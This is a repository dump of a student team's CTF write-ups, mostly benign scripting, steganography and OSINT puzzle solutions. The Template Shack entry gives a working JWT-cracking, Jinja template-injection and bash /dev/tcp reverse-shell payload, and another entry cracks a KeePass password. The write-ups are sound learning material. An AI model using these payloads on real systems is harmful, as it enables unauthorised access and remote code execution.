https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HacktivityCon CTF/Mobile/Mobile One/mobile_one.apk -------------------------------------------------------------------------------- /HacktivityCon CTF/Pwn/README.md: -------------------------------------------------------------------------------- 1 | # Pwn 2 | 3 | Check out the writeups at: 4 | https://hackmd.io/@HKraw/ryLQnzbZP -------------------------------------------------------------------------------- /HacktivityCon CTF/README.md: -------------------------------------------------------------------------------- 1 | # HacktivityCon CTF 2 | 3 | - Official URL: https://ctf.hacktivitycon.com/ 4 | - Format: Jeopardy 5 | - Duration: Thu, 30 July 2020, 00:30 IST — Sat, 01 Aug. 2020, 00:30 IST -------------------------------------------------------------------------------- /HacktivityCon CTF/Scripting/Hashbrown Caserole/README.md: -------------------------------------------------------------------------------- 1 | # Hashbrown Caserole 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | ``` 12 | Hashbrowns 13 | 14 | Connect here: 15 | nc jh2i.com 50005 16 | ``` 17 | 18 | # Exploitation 19 | 20 | ```python 21 | import hashlib 22 | from pwn import remote 23 | 24 | r = remote('jh2i.com', 50005) 25 | 26 | def match_sha1(n): 27 | for i in range(0, 10**8): 28 | if i%1000000 == 0: print(i) 29 | if(hashlib.sha1(str(i).encode()).hexdigest()[:len(n)] == n): 30 | return i 31 | 32 | def match_md5(n): 33 | for i in range(0, 10**8): 34 | if i%1000000 == 0: print(i) 35 | if(hashlib.md5(str(i).encode()).hexdigest()[:len(n)] == n): 36 | return i 37 | 38 | while True: 39 | t = 'md5' 40 | x = r.recv(1024).decode().strip() 41 | print(x) 42 | 43 | if 'sha1' in x: 44 | t = 'sha1' 45 | 46 | if ('flag' in x): break 47 | 48 | x = x.split(': ')[1] 49 | 50 | res = 0 51 | if t == 'md5': 52 | res = match_md5(x) 53 | else: 54 | res = match_sha1(x) 55 | 56 | r.sendline(str(res)) 57 | print('Sending: ' + str(res)) 58 | print(r.recvline().decode()) 59 | ``` 60 | 61 | This is probably not the most efficient script, you could create a reverse dictionary and map it directly, but this works too. The script runs for several minutes and gives you the flag. 62 | 63 | ```bash 64 | $ python script.py 65 | ... 66 | ... 67 | That casserole was DELICIOUS!!!! Here's your flag: flag{warm_casseroles_for_breakfast!!!} 68 | ``` 69 | 70 | 71 | The flag is: 72 | 73 | ``` 74 | flag{warm_casseroles_for_breakfast!!!} 75 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Scripting/Impartial/README.md: -------------------------------------------------------------------------------- 1 | # Impartial 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | ``` 12 | Check out the terminal-interface for this new company! Can you uncover any secrets? 13 | 14 | Connect with: 15 | nc jh2i.com 50026 16 | ``` 17 | 18 | # Exploitation 19 | 20 | Everytime you ask try to log in as admin, it asks you for 3 letters of the password. 21 | 22 | ``` 23 | Impartial Advice and Consulting 24 | . . . we will help you put the pieces together! 25 | 26 | 1. About 27 | 2. Login 28 | 3. Register 29 | 4. Contact 30 | ?. Exit 31 | 32 | > 2 33 | 34 | Please enter a username to log in. 35 | 36 | Username: admin 37 | 38 | For your security, please only enter a partial password. 39 | To protect your account from hackers, enter only the characters 40 | at position 13, 32, and 10 (separated by spaces). 41 | 42 | Password: 43 | ``` 44 | 45 | You can create a map of all characters and the possibilities of the character in that position. Once it is rejected, remove that possibility, and once it's correct, remove all other possibilities. Here's a script: 46 | 47 | ```python 48 | from pwn import remote 49 | import re 50 | import string 51 | 52 | r = remote("jh2i.com", 50026) 53 | 54 | flag = [''] + list('flag{') + ['?']*50 55 | 56 | letters = list(string.ascii_lowercase + '_}1234567890') 57 | tries = {i: letters for i in range(1, 51)} 58 | 59 | 60 | # flag = [''] + list('flag{partial?pass?ord?puz?le?pieces????????????????????') 61 | # flag{partial_password_puzzle_pieces} 62 | for i in range(1, len(flag)): 63 | if flag[i] == '?': continue 64 | tries[i] = [flag[i]] 65 | 66 | rec = r.recvuntil(">").decode() 67 | print(rec, end=" ") 68 | 69 | while True: 70 | res = b"2" 71 | r.sendline(res) 72 | print(res) 73 | 74 | rec = r.recvuntil("Username:").decode() 75 | print(rec, end=" ") 76 | 77 | res = b"admin" 78 | r.sendline(res) 79 | print(res) 80 | 81 | rec = r.recvuntil("Password:").decode() 82 | print(rec, end=" ") 83 | 84 | indices = [int(i) for i in re.findall(r'\d+', rec)] 85 | 86 | res = [] 87 | 88 | for index in indices: 89 | res.append(tries[index][0]) 90 | 91 | res = ' '.join(res) 92 | print(res) 93 | r.sendline(res) 94 | 95 | rec = r.recvuntil('>').decode() 96 | print(rec) 97 | 98 | if '1. Judge' in rec: 99 | r.sendline(b'3') 100 | print(''.join(flag)) 101 | continue 102 | 103 | x = rec.split('1. About')[0].strip().split('\n') 104 | 105 | for i in range(len(x)): 106 | t = tries[indices[i]] 107 | if 'WRONG' in x[i]: 108 | tries[indices[i]] = t[1:] 109 | else: 110 | tries[indices[i]] = [t[0]] 111 | flag[indices[i]] = t[0] 112 | print(''.join(flag)) 113 | ``` 114 | 115 | When I ran the script for a while, I got this much of the flag: 116 | 117 | ``` 118 | $ python script.py 119 | ... 120 | flag{partial?pass?ord?puz?le?pieces???????????????????? 121 | ``` 122 | 123 | From here, you can possibly guess the flag. 124 |
125 | 126 | The flag is: 127 | 128 | ``` 129 | flag{partial_password_puzzle_pieces} 130 | ``` 131 | -------------------------------------------------------------------------------- /HacktivityCon CTF/Scripting/Prophecy/README.md: -------------------------------------------------------------------------------- 1 | # Prophecy 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | - Pwntools (Linux) 9 | 10 | # Source 11 | 12 | ``` 13 | C A N Y O U S E E T H E F U T U R E ? 14 | 15 | Connect with: 16 | nc jh2i.com 50012 17 | ``` 18 | 19 | # Exploitation 20 | 21 | Everytime you connect using netcat, it makes you guess the number, and if you guess incorrectly, it tells you what the number was. Now, when you guess incorrectly, you know the number. Connect recursively and you get all the numbers. 22 | 23 | 24 | ```python 25 | from pwn import remote 26 | 27 | numbers = [0] * 100 28 | 29 | i = 0 30 | 31 | while True: 32 | if i == 0: 33 | r = remote("jh2i.com", 50012) 34 | 35 | try: 36 | re = r.recvuntil(">") 37 | except Exception as e: 38 | r.interactive() 39 | continue 40 | 41 | print(re.decode(), end=" ") 42 | 43 | r.sendline(str(numbers[i]).encode()) 44 | print(str(numbers[i])) 45 | 46 | print([i for i in numbers if i != 0]) 47 | 48 | if numbers[i] == 0: 49 | res = r.recvuntil(".").decode() 50 | res += r.recv(1024).decode() 51 | numbers[i] = res.split("W A S ")[1].strip() 52 | i = 0 53 | else: 54 | i += 1 55 | ``` 56 | 57 | The scripts runs for a few minutes and in the end it gives you the flag. 58 | 59 | ```bash 60 | $ python script.py 61 | ... 62 | 63 | W H A T I S T H E N E X T N U M B E R T O C O M E F R O M T H E F U T U R E ? 64 | 65 | > 83643 66 | ['99126', '76106', '32378', '49560', '87935', '17366', '36639', '33561', '51241', '24009', '82718', '65774', '87030', '53097', '53885', '29931', '10890', '20583', '46190', '83643'] 67 | [*] Switching to interactive mode 68 | ============================================================================== 69 | 70 | Y O U T O O C A N S E E T H E F U T U R E 71 | ============================================================================== 72 | flag{does_this_count_as_artificial_intelligence} 73 | ``` 74 | 75 | The flag is 76 | 77 | ``` 78 | flag{does_this_count_as_artificial_intelligence} 79 | ``` 80 | -------------------------------------------------------------------------------- /HacktivityCon CTF/Scripting/Tootsie Pop/README.md: -------------------------------------------------------------------------------- 1 | # Tootsie Pop 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | ``` 12 | How many licks does it take to get to the center of a tootsie pop? 13 | 14 | Download the file below. 15 | ``` 16 | 17 | - [pop.zip](./pop.zip) 18 | 19 | # Exploitation 20 | 21 | The flag has been compressed recursively with various types of compressing tools, namely 'xz', 'zip', 'bzip', 'gzip'. You can write a script to use the `file` command to find out the compression type of the current file and decompress it depending upon the type of compression. 22 | 23 | ```python 24 | import subprocess 25 | import os 26 | 27 | filetypes = ['xz', 'zip', 'bzip', 'gzip'] 28 | 29 | while True: 30 | x = subprocess.check_output('ls', shell=True).decode().split('\n')[0] 31 | print(x) 32 | 33 | y = subprocess.check_output(f'file {x}', shell=True).decode() 34 | print(y) 35 | 36 | if 'gzip' in y: 37 | if not x.endswith('.gz'): 38 | os.system(f'mv {x} {x}.gz') 39 | x = f'{x}.gz' 40 | os.system(f'gunzip {x}') 41 | print('Uncompressed gzip') 42 | 43 | if 'XZ' in y: 44 | if not x.endswith('.xz'): 45 | os.system(f'mv {x} {x}.xz') 46 | x = f'{x}.xz' 47 | os.system(f'unxz {x}') 48 | print('Uncompressed xz') 49 | 50 | if 'bzip2' in y: 51 | if not x.endswith('.bz2'): 52 | os.system(f'mv {x} {x}.bz2') 53 | x = f'{x}.bz2' 54 | os.system(f'bzip2 -d {x}') 55 | print('Uncompressed bz2') 56 | 57 | if 'Zip' in y: 58 | if not x.endswith('.zip'): 59 | os.system(f'mv {x} {x}.zip') 60 | x = f'{x}.zip' 61 | os.system(f'unzip {x}') 62 | print('Uncompressed zip') 63 | os.system(f'mv {x} trash/{x}') 64 | 65 | if 'ASCII' in y: 66 | os.system(f'cat {x}') 67 | break 68 | ``` 69 | 70 | Remember to have a `trash` folder in the same directory as your script. Once it decompresses all, it gives you the flag in a file called `8c4be4`. 71 | 72 | ```bash 73 | $ python script.py 74 | ... 75 | ... 76 | flag{the_answer_is_1548_licks} 77 | ``` 78 | 79 | 80 | The flag is: 81 | 82 | ``` 83 | flag{the_answer_is_1548_licks} 84 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Scripting/Tootsie Pop/pop.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HacktivityCon CTF/Scripting/Tootsie Pop/pop.zip -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Chess Cheater/README.md: -------------------------------------------------------------------------------- 1 | # Cold War 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Morse Decoder 8 | 9 | # Source 10 | 11 | ``` 12 | I didn't think he was a genius, I knew he had to be a cheat. He was always sitting down, he never got up. Batting his eyelids in the most unnatural way. Then I understood it. 13 | 14 | Note, this flag is not in the usual format. 15 | 16 | Download the file below. 17 | ``` 18 | 19 | - [morse.wav](./morse.wav) 20 | 21 | # Exploitation 22 | 23 | Decode the morse code audio (I used an online decoder at [morsecode.world](https://morsecode.world/international/decoder/audio-decoder-adaptive.html)). You get something along the lines of `ARCANGELORICCIARDI`. Maybe it's a bit distorted sometimes, but when you search it up on google, you see that Arcangelo Ricciardi was accused of cheating in a game of chess by using morse code. 24 |
25 | 26 | The flag is: 27 | 28 | ``` 29 | ARCANGELORICCIARDI 30 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Chess Cheater/morse.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HacktivityCon CTF/Steganography/Chess Cheater/morse.wav -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Cold War/README.md: -------------------------------------------------------------------------------- 1 | # Cold War 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Stegsnow 8 | 9 | # Source 10 | 11 | ``` 12 | A geopolitical activity that is pursued through economic and political actions, propaganda, acts of espionage or proxy wars and without direct military action is known as a Cold War. This type of war does not refer to conflict of seasons, but this challenge might. 13 | 14 | Download the file below. 15 | ``` 16 | 17 | - [cold_war.txt](./cold_war.txt) 18 | 19 | # Exploitation 20 | 21 | The repeated usage of `cold` war hints that you might have to use stegsnow. And it is in fact what you need to use. 22 | 23 | ``` 24 | $ stegsnow -C cold_war.txt 25 | flag{do_not_use_merriam_webster}# 26 | ``` 27 | 28 | The flag is: 29 | 30 | ``` 31 | flag{do_not_use_merriam_webster} 32 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Cold War/cold_war.txt: -------------------------------------------------------------------------------- 1 | The Cold War continues to influence world affairs. The post-Cold War world is considered to be unipolar, with the United States the sole remaining superpower.The Cold War defined the political role of the United States after World War II—by 1989 the United States had military alliances with 50 countries, with 526,000 troops stationed abroad, with 326,000 in Europe (two-thirds of which were in West Germany) and 130,000 in Asia (mainly Japan and South Korea). The Cold War also marked the zenith of peacetime military–industrial complexes, especially in the United States, and large-scale military funding of science. These complexes, though their origins may be found as early as the 19th century, snowballed considerably during the Cold War. 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Spy vs. Spy/README.md: -------------------------------------------------------------------------------- 1 | # Spy vs. Spy 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Gimp / Stegsolve 8 | 9 | # Source 10 | 11 | ``` 12 | Antonio Prohías was a cartoonist known primarily as the creator of the satirical comic strip Spy vs. Spy for Mad magazine. It wasn't until after 1997 when the comics changed from black and white to full color. 13 | 14 | Download the file below. 15 | ``` 16 | 17 | - [spy_vs_spy.png](./spy_vs_spy.png) 18 | 19 | # Exploitation 20 | 21 | The intended solution is probably to use `stegsolve`. We just opened the image in gimp, reduced brightness and increased contrast. Finally, you can see `spies}` on top of the image. We guessed the rest of the flag, using Wikipedia for information XD. 22 |
23 | 24 | The flag is: 25 | 26 | ``` 27 | flag{two_MAD_spies} 28 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Steganography/Spy vs. Spy/spy_vs_spy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HacktivityCon CTF/Steganography/Spy vs. Spy/spy_vs_spy.png -------------------------------------------------------------------------------- /HacktivityCon CTF/Web/Template Shack/README.md: -------------------------------------------------------------------------------- 1 | # Template Shack 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - JWT 8 | - John The Ripper 9 | 10 | # Source 11 | 12 | ``` 13 | Check out the coolest web templates online! 14 | 15 | Connect here: 16 | http://jh2i.com:50023 17 | ``` 18 | 19 | # Exploitation 20 | 21 | When you visit the website, you find that there's a cookie containing a JWT. It's hashed using `HS256`. We used `rockyou.txt` to bruteforce the JWT secret, using John The Ripper. 22 | 23 | ``` 24 | $ john jwt.txt --wordlist=rockyou.txt --format=HMAC-SHA256 25 | ``` 26 | 27 | The secret is `supersecret`. Using this, you can make a JWT with `username: admin`. 28 | 29 | ``` 30 | eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.Ykqid4LTnSPZtoFb11H-_2q-Vo32g4mLpkEcajK0H7I 31 | ``` 32 | 33 | Now, add this to your cookie. You are logged in as admin. Visit some random route starting with `/admin/` which throws a 404. You can see there's scope for template injection in the 404 page. 34 | 35 | ``` 36 | http://jh2i.com:50023/template/admin/%7B%7B().__class__.__bases__[0].__subclasses__()%7D%7D 37 | ``` 38 | 39 | You can climb up the Python MRO using the `__class__` and `__bases__`, etc. This way you can find a list of all the classes you can use. On index 405, you see `subprocess.Popen`. 40 | 41 | ``` 42 | http://jh2i.com:50023/template/admin/%7B%7B().__class__.__bases__[0].__subclasses__()[405]%7D%7D 43 | ``` 44 | 45 | This shows `/template/admin/` on the website. 46 | 47 | Now, you can use this to spawn a reverse shell. 48 | 49 | ``` 50 | http://jh2i.com:50023/template/admin/%7B%7B().__class__.__bases__[0].__subclasses__()[405](['bash -c %22bash -i %3E& /dev/tcp/yourserverip/yourport 0%3E&1%22'], shell=True)%7D%7D 51 | ``` 52 | 53 | > Note: Replace yourserverip and yourport. 54 | 55 | Start a `netcat` listener on your server at the specified port. 56 | 57 | You get a shell! 58 | 59 | ``` 60 | $ nc -lp 8000 61 | bash: cannot set terminal process group (8): Inappropriate ioctl for device 62 | bash: no job control in this shell 63 | user@272108e56147:~$ ls 64 | ls 65 | flag.txt 66 | main.py 67 | posts.py 68 | requirements.txt 69 | templates 70 | user@272108e56147:~$ cat flag.txt 71 | cat flag.txt 72 | flag{easy_jinja_SSTI_RCE} 73 | ``` 74 | 75 | The flag is: 76 | 77 | ``` 78 | flag{easy_jinja_SSTI_RCE} 79 | ``` -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Computer Society of India - VIT University 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /NahamCon CTF/Crpytography/Homecooked/decrypt.py: -------------------------------------------------------------------------------- 1 | import base64 2 | num = 0 3 | count = 0 4 | cipher_b64 = b"MTAwLDExMSwxMDAsOTYsMTEyLDIxLDIwOSwxNjYsMjE2LDE0MCwzMzAsMzE4LDMyMSw3MDIyMSw3MDQxNCw3MDU0NCw3MTQxNCw3MTgxMCw3MjIxMSw3MjgyNyw3MzAwMCw3MzMxOSw3MzcyMiw3NDA4OCw3NDY0Myw3NTU0MiwxMDAyOTAzLDEwMDgwOTQsMTAyMjA4OSwxMDI4MTA0LDEwMzUzMzcsMTA0MzQ0OCwxMDU1NTg3LDEwNjI1NDEsMTA2NTcxNSwxMDc0NzQ5LDEwODI4NDQsMTA4NTY5NiwxMDkyOTY2LDEwOTQwMDA=" 5 | 6 | def a(num): 7 | if (num > 1): 8 | for i in range(2,num): 9 | if (num % i) == 0: 10 | return False 11 | break 12 | return True 13 | else: 14 | return False 15 | 16 | def b(num): 17 | my_str = str(num) 18 | rev_str = reversed(my_str) 19 | if list(my_str) == list(rev_str): 20 | return True 21 | else: 22 | return False 23 | 24 | 25 | cipher = base64.b64decode(cipher_b64).decode().split(",") 26 | 27 | while(count < len(cipher)): 28 | if (a(num)): 29 | if (b(num)): 30 | print(chr(int(cipher[count]) ^ num), end='', flush=True) 31 | count += 1 32 | if (count == 13): 33 | num = 50000 34 | if (count == 26): 35 | num = 500000 36 | else: 37 | pass 38 | num+=1 39 | 40 | print() -------------------------------------------------------------------------------- /NahamCon CTF/README.md: -------------------------------------------------------------------------------- 1 | # NahamCon CTF 2 | 3 | - Official URL: https://ctf.nahamcon.com/challenges 4 | - Format: Jeopardy 5 | - Duration: Fri, 12 June 2020, 20:30 IST — Sun, 14 June 2020, 03:30 IST 6 | -------------------------------------------------------------------------------- /NahamCon CTF/Scripting/Rotten/script.py: -------------------------------------------------------------------------------- 1 | flag = [None]*100 2 | def response(s): 3 | offset = ord(s[0]) - ord('s') 4 | 5 | position = 0 6 | 7 | res = '' 8 | for i in s: 9 | if not i.isalpha(): 10 | if i.isnumeric(): 11 | position = position*10 + int(i) 12 | 13 | res += i 14 | continue 15 | res += chr((ord(i) - ord('a') - offset) % 26 + ord('a')) 16 | 17 | if len(res) == 55: 18 | return res 19 | 20 | flag[position] = res[-2] 21 | 22 | return res 23 | 24 | from pwn import remote 25 | 26 | r = remote('jh2i.com', 50034) 27 | 28 | while True: 29 | received = r.recv() 30 | x = received.decode().strip() 31 | 32 | print(x) 33 | y = response(x) 34 | r.send(y) 35 | print(y) 36 | print() 37 | f = ''.join([i for i in flag if i != None]) 38 | print(f) 39 | print() 40 | 41 | # Rotten 42 | -------------------------------------------------------------------------------- /NahamCon CTF/Warmup/Easy Keesy/README.md: -------------------------------------------------------------------------------- 1 | # Easy Keesy 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | The file downloaded is a password protected Keepass file. You bruteforce the password using `John the Ripper` and you open the file to see the flag. 6 | 7 | # Requirements 8 | 9 | - John the Ripper 10 | - keepass2john 11 | 12 | # Source 13 | 14 | ``` 15 | Dang it, not again... 16 | 17 | Download the file below. 18 | 19 | [easy_keesy](https://ctf.nahamcon.com/files/4ae2a2f6c8aaca62ed67141489e995d0/easy_keesy?token=eyJ1c2VyX2lkIjoyMzk2LCJ0ZWFtX2lkIjpudWxsLCJmaWxlX2lkIjozMH0.XuYl2A.3KcnraGOdGA0MCn9yVrweyEto-E) 20 | ``` 21 | 22 | The file is included in the repo as well: [easy_keesy](./easy_keesy). 23 | 24 | # Exploitation 25 | 26 | First, we check what kind of a file it actually is. The Linux `file` can be used for this. 27 | 28 | ```bash 29 | $ file easy_keesy 30 | easy_keesy: Keepass password database 2.x KDBX 31 | ``` 32 | 33 | So, this is a password protected `keepass` file. We're going to use `John the Ripper` to bruteforce the password. But, before that, we need to convert the file into a format `John` can read. 34 | 35 | ```bash 36 | keepass2john easy_keesy > ek 37 | ``` 38 | 39 | The output from the `keepass2john` tool is now saved in a file `ek`. Now, you just run `john ek` and wait till you get a password. The valid password obtained is `monkeys`. 40 |
41 | 42 | Now, just open the keepass file, enter the password, and read the flag. -------------------------------------------------------------------------------- /NahamCon CTF/Warmup/Easy Keesy/easy_keesy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/NahamCon CTF/Warmup/Easy Keesy/easy_keesy -------------------------------------------------------------------------------- /NahamCon CTF/Warmup/UGGC/README.md: -------------------------------------------------------------------------------- 1 | # UGGC 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | In this challenge, the goal is to modify the cookies so that you become the admin. 6 | 7 | # Requirements 8 | 9 | - Browser Devtools 10 | 11 | # Source 12 | 13 | - http://jh2i.com:50018/login 14 | 15 | ``` 16 | Become the admin! 17 | 18 | Connect here: 19 | http://jh2i.com:50018 20 | ``` 21 | 22 | # Exploitation 23 | 24 | When you type in a random username, for example, `csictf`, and check the Cookies in the Application tab of Browser Dev-Tools (alternatively `console.log(document.cookie)`), you see a cookie named user set to `pfvpgs`. The target is to make the username corresponding to this cookie be `admin`. This is similar to another Caesar's cipher challenge. 25 | 26 | As you see, there is an offset of 13 between the characters in `csictf` and `pfvpgs`. Therefore, you can find out the string corresponding to `admin` by encrypting it with an offset of 13. 27 | 28 | ```python 29 | >>> print(''.join([chr((ord(i) + 13)) for i in 'admin'])) 30 | 'nqzv{' 31 | ``` 32 | 33 | Now, the last character is `{`, so we subtract 26 to get the required character. 34 | 35 | > Note: The offset is 13 and we know 'n' maps to 'a', so obviously 'a' will map to 'n', but we'll try it anyway. 36 | 37 | ```python 38 | >>> print(chr(ord('{')-26)) 39 | 'a' 40 | ``` 41 | 42 | So the target cookie is `nqzva`. Modify the cookie on Browser Dev-tools and refresh the page to get the flag. 43 | 44 | ``` 45 | flag{H4cK_aLL_7H3_C0okI3s} 46 | ``` -------------------------------------------------------------------------------- /NahamCon CTF/Web/Agent 95/README.md: -------------------------------------------------------------------------------- 1 | # Agent 95 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | As the name suggest, change the User Agent to Windows 95. 6 | 7 | # Requirements 8 | 9 | - Basic Knowledge of Request headers 10 | 11 | # Source 12 | 13 | - http://jh2i.com:50000. 14 | 15 | ``` 16 | They've given you a number, and taken away your name~ 17 | 18 | Connect here: 19 | http://jh2i.com:50000 20 | ``` 21 | 22 | # Exploitation 23 | 24 | The challenge is very simple once you know what to do. 25 | 26 | ``` 27 | We will only give our flag to our Agent 95! He is still running an old version of Windows... 28 | ``` 29 | 30 | We assume Agent 95 uses Windows 95. So just change the `User-Agent` header to `Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)`. 31 | 32 | ```python 33 | >>> import requests 34 | >>> r = requests.get('http://jh2i.com:50000', headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)'}) 35 | >>> r.text 36 | 'flag{user_agents_undercover}\n
\n



\n NOT CHALLENGE RELATED:
THANK YOU to Digital Ocean for supporting NahamCon and NahamCon CTF!\n

\n\n

\n
' 37 | ``` 38 | 39 | There, you got the flag. 40 | 41 | ``` 42 | flag{user_agents_undercover} 43 | ``` -------------------------------------------------------------------------------- /UMDCTF 2021/Crypto/Art Class.md: -------------------------------------------------------------------------------- 1 | > # Art Class - Crypto 2 | Author - [Rakesh](http://github.com/Rakesh1772) 3 | --- 4 | Requirements : Ability to google efficiently. 5 | 6 | --- 7 | Problem description - 8 | 9 | > I was drawing in art class when I glanced over at my classmates drawings. I snapped a picture because I wanted to look up what it meant. Can you figure out what this drawing is? 10 | 11 | Below this, a link was provided to download an image. 12 | 13 | Here's the image: 14 | ![Art Class IMG](https://i.imgur.com/u2hXiU9.png) 15 | 16 | Initial thoughts after looking at this image was that these were a bunch of flags from different countries and we can just decode this by looking up each country, but most of these flags did not belong to any country. So I looked up for online flag identifiers and found this [website](http://www.flag-finder.com/). Here I found out the first flag and it was a signal flag representing a specific letter. 17 | 18 | So I looked up for signal flags on google and dicovered that the given flags were [International maritime signal flags](https://en.wikipedia.org/wiki/International_maritime_signal_flags). 19 | 20 | After this, it was just a matter of decoding each flag to the respective letter. 21 | ![Maritime Signal Flags](https://i.imgur.com/9yHUap7.jpg) 22 | 23 | 24 | The flag for this challenge is **UMDCTF-{F1AG_0F_7LA9S}**. 25 | -------------------------------------------------------------------------------- /UMDCTF 2021/OSINT/vacation.md: -------------------------------------------------------------------------------- 1 | # Vacation - OSINT 2 | 3 | Author - [BlackJack](http://github.com/Mannan-Goyal) 4 | 5 | Requirements : Know how to google 6 | 7 | * * * 8 | 9 | When we start to solve the challenge we are faced with a pretty elaborate hint which says - 10 | 11 | > My mom told me she went to this amazing brewing company in the Carribbean and when I asked her the name of the place, she sent me a picture of her ship. Can you help me find the name of this brewing company? 12 | 13 | This already narrows our search in the Carribbean... 14 | 15 | After this we move on to inspect the picture provided as a google drive link 16 | 17 | ![Challenge Image](https://lh3.googleusercontent.com/fife/ABSRlIoJz8F6GMMjVYrLh7-cfEAqrRP6IBO8BT0_U-KpvWxdHAdDinNBRhC6vyk6AvFPF_AG5XxRx1UqPOfLnTxNlEWSP16vLl2on5H5a20zpxfAkr6R8KvjLCQtLr2jJ9lbcg3Xz7tW9MU_ncKpKPImg4EVMETes96kX8uglzjz6NWm7XhpbXQenkFUDeyQOMuqFlArBeQCiAgNQ7RuQ55Tx-vWivYd-P1hnseWg1Xo_xhXBQ_XHKBqTUtchoOfG48wh3rQFcBVA2f7unJjI2bih2wk9CcicvOTKdKAT1Yfwzy_N-XzylVUxLm5ebZA8RlcU0m_Z6FRMNswDlQLt5I3OjSboiRkMwjqN1CKzUpzwO-pWZ0G9Pe_w7wmJpxv5lJ9228EdSPDNnZ-aWMfkGe0RaT94LY8AIUzMEX8PpCbk8zN6Cu9p4fRJbCus5DBw4jB6CNwL03pvFqnelgoBTKD82QKro07VmJ6Zg7NFjFBL_Iao7HsKYEZQcqdv23SZNEU1mTYbJfx8i8Lxv4KHuLMUftpJaTRR3lAMF-2lPVlml_yGxLvE7DE-OAti1y33-L5TPyYOwYPgpFDNYfHpbw21mENVC2r2eYnd27sL22-YkQycieXSlQANXJJX6Rqj8b0RpLy9NYd8qyKZ0SbY78-MVa2MapCyAhpTntsa3OArE2QDAM_CDHniZ9iK94NONdl0M0FGRKgSfseiaIlXYJL2oRiLNoz1W9OZ9A=w1346-h647-ft) 18 | 19 | From this we can gather 3 hints- 20 | ![Challenge_Image_Hints](https://i.imgur.com/eqi0WFe.png) 21 | 22 | 1. Name of the Ship - Freedom of Seas 23 | 2. Name of the ship owning company - RoyalCalCarribbean 24 | 3. Name of the bar - Rum Therapy 25 | 26 | After this I immediately went on to look up the route that this particular ship usually takes, with a simple google search I found this - [Route](https://www.cruisemapper.com/ships/Freedom-Of-The-Seas-654) 27 | 28 | This didn't help much so I went on to search the bar on google, since the top searches were mostly promotional I thought it would be better to just move to the map view where I saw 29 | ![Map View](https://i.imgur.com/m8dafEg.png) 30 | 31 | Since there were only 2 results I changed to 3d satellite view by dropping the marker on the bottom left near both locations, when I saw the 1st location 32 | 33 | ![Sat View](https://i.imgur.com/MseMAjY.png) 34 | the scene seemed very familiar to the original picture and if you zoom in a bit you'd see Antillia Brewing Company. Couldn't be a coincidence now... 35 | 36 | So I went on to submit the flag and I wrote this 37 | `UMDCTF-{Stlucia_Antillia}` 38 | 39 | Which was ofcourse incorrect, it was later after a lot of frustration I realised that Instead of St. Lucia I had to write the name of the city 40 | 41 | So finally the flag is 42 | `UMDCTF-{Castries_Antillia}` 43 | 44 | (This city name was also mentioned on the top left in the satellite view image that I included above) 45 | -------------------------------------------------------------------------------- /UMDCTF 2021/forensics/NotSlick.md: 